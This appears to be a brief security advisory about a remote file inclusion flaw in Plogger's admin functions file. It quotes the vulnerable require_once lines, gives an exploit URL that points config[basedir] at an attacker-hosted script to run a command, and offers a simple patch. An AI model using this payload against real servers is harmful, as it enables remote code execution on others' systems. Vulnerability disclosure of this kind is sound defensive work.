Security .Net Information (Infobugs) Advisore:
Plogger include bug in /admin/plog-admin-functions.php
VULN:
================ Codigo Vuln===============
<?php
require_once($config['basedir'] . "/plog-functions.php"); <--- VULN
require_once($config['basedir'] . "/lib/exifer1_4/exif.php"); <--- VULN
function add_picture($album_id,$tmpname,$filename,$caption) {
global $TABLE_PREFIX;
global $config;
================ Codigo Vuln===============
Exploit:
http://www.server.com/PATH/admin/plog-admin-functions.php?config[basedir]=http://www.hack.com/evil_file.php?cmd=uptime
Fix By ARIEL ( arielutn@gmail.com Esta direcci&oacuten de correo electr&oacutenico esta protegida contra el spam, necesitas activar javascript )
<?php
if ($_REQUEST['config'] || ($_REQUEST['basedir']))
die('nou nou nouuuu');
require_once($config['basedir'] . "/plog-functions.php");
require_once($config['basedir'] . "/lib/exifer1_4/exif.php");
function add_picture($album_id,$tmpname,$filename,$caption) {
global $TABLE_PREFIX;
global $config;
===================
Greetz:
ARIEL ( arielutn@gmail.com Esta direcci&oacuten de correo electr oacutenico esta protegida contra el spam, necesitas activar javascript ) for Fix, ATY SPEED ROOT Mr_Nice and friends of Infobugs =)
Original Advisore in Spanish:
http://freeconnects.webcindario.com/index.php?option=com_content&task=view&id=41&Itemid=1
Security .Net Information
FumetasHouse Corporation
int21h From Argentina =)